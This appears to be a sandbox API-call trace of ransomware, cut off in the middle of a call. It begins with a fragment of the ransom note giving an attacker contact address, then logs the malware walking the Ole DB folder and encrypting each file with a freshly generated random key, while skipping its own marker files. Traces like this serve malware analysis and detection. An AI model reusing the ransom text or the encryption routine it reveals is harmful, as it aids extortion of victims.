\r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.291] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.292] lstrlenA (lpString="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") returned 1368 [0251.292] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.292] CloseHandle (hObject=0x158) returned 1 [0251.293] GetProcessHeap () returned 0x780000 [0251.293] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.293] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ad34e79, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9ad34e79, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9ad5afda, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1f000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdaosp.dll", cAlternateFileName="")) returned 1 [0251.293] lstrcmpiW (lpString1="msdaosp.dll", lpString2="Windows") returned -1 [0251.293] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned 59 [0251.293] StrStrIW (lpFirst="msdaosp.dll", lpSrch=".horseleader") returned 0x0 [0251.293] lstrcmpW (lpString1="msdaosp.dll", lpString2="#Decrypt#.txt") returned 1 [0251.293] lstrcmpW (lpString1="msdaosp.dll", lpString2="_uninstalling_.png") returned 1 [0251.293] lstrlenW (lpString=".testttjffg") returned 11 [0251.293] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole 
DB\\msdaosp.dll", lpSrch=".testttjffg") returned 0x0 [0251.293] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.293] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.294] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaosp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.294] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14cd0c35, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x14cd0c35, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x349a6d70, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x6a000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdaps.dll", cAlternateFileName="")) returned 1 [0251.294] lstrcmpiW (lpString1="msdaps.dll", lpString2="Windows") returned -1 [0251.294] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned 58 [0251.294] StrStrIW (lpFirst="msdaps.dll", lpSrch=".horseleader") returned 0x0 [0251.294] lstrcmpW (lpString1="msdaps.dll", lpString2="#Decrypt#.txt") returned 1 [0251.294] lstrcmpW (lpString1="msdaps.dll", lpString2="_uninstalling_.png") returned 1 [0251.294] lstrlenW (lpString=".testttjffg") returned 11 [0251.294] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll", lpSrch=".testttjffg") returned 0x0 [0251.295] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, 
pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.295] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.295] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.296] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86c0138a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x86c0138a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x86c0138a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb6000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdasql.dll", cAlternateFileName="")) returned 1 [0251.296] lstrcmpiW (lpString1="msdasql.dll", lpString2="Windows") returned -1 [0251.296] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll") returned 59 [0251.296] StrStrIW (lpFirst="msdasql.dll", lpSrch=".horseleader") returned 0x0 [0251.296] lstrcmpW (lpString1="msdasql.dll", lpString2="#Decrypt#.txt") returned 1 [0251.296] lstrcmpW (lpString1="msdasql.dll", lpString2="_uninstalling_.png") returned 1 [0251.296] lstrlenW (lpString=".testttjffg") returned 11 [0251.296] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll", lpSrch=".testttjffg") returned 0x0 [0251.296] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.296] CryptEncrypt (in: hKey=0x7c65a0, 
hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.296] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasql.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.297] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ab69cf, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x2ab69cf, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x838ac7b0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0xf000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdasqlr.dll", cAlternateFileName="")) returned 1 [0251.297] lstrcmpiW (lpString1="msdasqlr.dll", lpString2="Windows") returned -1 [0251.297] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll") returned 60 [0251.297] StrStrIW (lpFirst="msdasqlr.dll", lpSrch=".horseleader") returned 0x0 [0251.297] lstrcmpW (lpString1="msdasqlr.dll", lpString2="#Decrypt#.txt") returned 1 [0251.297] lstrcmpW (lpString1="msdasqlr.dll", lpString2="_uninstalling_.png") returned 1 [0251.297] lstrlenW (lpString=".testttjffg") returned 11 [0251.297] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll", lpSrch=".testttjffg") returned 0x0 [0251.297] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.297] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.297] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasqlr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.297] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc3c3a6b, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfc3c3a6b, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x349f2860, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x20000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msdatl3.dll", cAlternateFileName="")) returned 1 [0251.297] lstrcmpiW (lpString1="msdatl3.dll", lpString2="Windows") returned -1 [0251.297] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll") returned 59 [0251.297] StrStrIW (lpFirst="msdatl3.dll", lpSrch=".horseleader") returned 0x0 [0251.297] lstrcmpW (lpString1="msdatl3.dll", lpString2="#Decrypt#.txt") returned 1 [0251.297] lstrcmpW (lpString1="msdatl3.dll", lpString2="_uninstalling_.png") returned 1 [0251.297] lstrlenW (lpString=".testttjffg") returned 11 [0251.297] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll", lpSrch=".testttjffg") returned 0x0 [0251.298] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.298] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.298] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdatl3.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.298] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d2cdc0, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x1d2cdc0, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x383128c0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x9000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msxactps.dll", cAlternateFileName="")) returned 1 [0251.298] lstrcmpiW (lpString1="msxactps.dll", lpString2="Windows") returned -1 [0251.298] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll") returned 60 [0251.298] StrStrIW (lpFirst="msxactps.dll", lpSrch=".horseleader") returned 0x0 [0251.298] lstrcmpW (lpString1="msxactps.dll", lpString2="#Decrypt#.txt") returned 1 [0251.298] lstrcmpW (lpString1="msxactps.dll", lpString2="_uninstalling_.png") returned 1 [0251.298] lstrlenW (lpString=".testttjffg") returned 11 [0251.298] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll", lpSrch=".testttjffg") returned 0x0 [0251.298] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.298] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.298] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll" (normalized: 
"c:\\program files\\common files\\system\\ole db\\msxactps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.299] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84c2ad0f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x84c2ad0f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x84c50e6f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10d000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="oledb32.dll", cAlternateFileName="")) returned 1 [0251.299] lstrcmpiW (lpString1="oledb32.dll", lpString2="Windows") returned -1 [0251.300] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll") returned 59 [0251.300] StrStrIW (lpFirst="oledb32.dll", lpSrch=".horseleader") returned 0x0 [0251.300] lstrcmpW (lpString1="oledb32.dll", lpString2="#Decrypt#.txt") returned 1 [0251.300] lstrcmpW (lpString1="oledb32.dll", lpString2="_uninstalling_.png") returned 1 [0251.300] lstrlenW (lpString=".testttjffg") returned 11 [0251.300] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll", lpSrch=".testttjffg") returned 0x0 [0251.300] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.300] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.300] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32.dll"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.300] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfabf604b, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfabf604b, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0xdf9a48f0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x14000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="oledb32r.dll", cAlternateFileName="")) returned 1 [0251.300] lstrcmpiW (lpString1="oledb32r.dll", lpString2="Windows") returned -1 [0251.300] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll") returned 60 [0251.300] StrStrIW (lpFirst="oledb32r.dll", lpSrch=".horseleader") returned 0x0 [0251.301] lstrcmpW (lpString1="oledb32r.dll", lpString2="#Decrypt#.txt") returned 1 [0251.301] lstrcmpW (lpString1="oledb32r.dll", lpString2="_uninstalling_.png") returned 1 [0251.301] lstrlenW (lpString=".testttjffg") returned 11 [0251.301] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll", lpSrch=".testttjffg") returned 0x0 [0251.301] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.301] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.301] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32r.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.301] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa542845b, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa542845b, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa4ffde2f, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0x264c, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="oledbjvs.inc", cAlternateFileName="")) returned 1 [0251.301] lstrcmpiW (lpString1="oledbjvs.inc", lpString2="Windows") returned -1 [0251.301] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 60 [0251.301] StrStrIW (lpFirst="oledbjvs.inc", lpSrch=".horseleader") returned 0x0 [0251.301] lstrcmpW (lpString1="oledbjvs.inc", lpString2="#Decrypt#.txt") returned 1 [0251.301] lstrcmpW (lpString1="oledbjvs.inc", lpString2="_uninstalling_.png") returned 1 [0251.301] lstrlenW (lpString=".testttjffg") returned 11 [0251.302] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc", lpSrch=".testttjffg") returned 0x0 [0251.302] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.302] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.302] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.303] FindNextFileW (in: 
hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa542845b, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa542845b, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa52d1816, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0x26f7, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="oledbvbs.inc", cAlternateFileName="")) returned 1 [0251.303] lstrcmpiW (lpString1="oledbvbs.inc", lpString2="Windows") returned -1 [0251.303] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 60 [0251.303] StrStrIW (lpFirst="oledbvbs.inc", lpSrch=".horseleader") returned 0x0 [0251.303] lstrcmpW (lpString1="oledbvbs.inc", lpString2="#Decrypt#.txt") returned 1 [0251.303] lstrcmpW (lpString1="oledbvbs.inc", lpString2="_uninstalling_.png") returned 1 [0251.303] lstrlenW (lpString=".testttjffg") returned 11 [0251.303] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc", lpSrch=".testttjffg") returned 0x0 [0251.303] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.303] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.303] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.303] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f0bf91, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x92f0bf91, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x92f320f1, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x128000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="sqloledb.dll", cAlternateFileName="")) returned 1 [0251.303] lstrcmpiW (lpString1="sqloledb.dll", lpString2="Windows") returned -1 [0251.304] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll") returned 60 [0251.304] StrStrIW (lpFirst="sqloledb.dll", lpSrch=".horseleader") returned 0x0 [0251.304] lstrcmpW (lpString1="sqloledb.dll", lpString2="#Decrypt#.txt") returned 1 [0251.304] lstrcmpW (lpString1="sqloledb.dll", lpString2="_uninstalling_.png") returned 1 [0251.304] lstrlenW (lpString=".testttjffg") returned 11 [0251.304] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll", lpSrch=".testttjffg") returned 0x0 [0251.304] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.304] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.304] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.304] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc9350f, 
ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xcc9350f, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0xcc210f8, ftLastWriteTime.dwHighDateTime=0x1ca041a, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="sqloledb.rll", cAlternateFileName="")) returned 1 [0251.304] lstrcmpiW (lpString1="sqloledb.rll", lpString2="Windows") returned -1 [0251.304] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll") returned 60 [0251.304] StrStrIW (lpFirst="sqloledb.rll", lpSrch=".horseleader") returned 0x0 [0251.305] lstrcmpW (lpString1="sqloledb.rll", lpString2="#Decrypt#.txt") returned 1 [0251.305] lstrcmpW (lpString1="sqloledb.rll", lpString2="_uninstalling_.png") returned 1 [0251.305] lstrlenW (lpString=".testttjffg") returned 11 [0251.305] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll", lpSrch=".testttjffg") returned 0x0 [0251.305] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.305] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.305] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.305] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f7e4bf, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x14f7e4bf, 
ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x44773fc0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x59000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="sqlxmlx.dll", cAlternateFileName="")) returned 1 [0251.305] lstrcmpiW (lpString1="sqlxmlx.dll", lpString2="Windows") returned -1 [0251.305] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll") returned 59 [0251.305] StrStrIW (lpFirst="sqlxmlx.dll", lpSrch=".horseleader") returned 0x0 [0251.305] lstrcmpW (lpString1="sqlxmlx.dll", lpString2="#Decrypt#.txt") returned 1 [0251.305] lstrcmpW (lpString1="sqlxmlx.dll", lpString2="_uninstalling_.png") returned 1 [0251.305] lstrlenW (lpString=".testttjffg") returned 11 [0251.305] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll", lpSrch=".testttjffg") returned 0x0 [0251.305] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.306] CryptEncrypt (in: hKey=0x7c65a0, 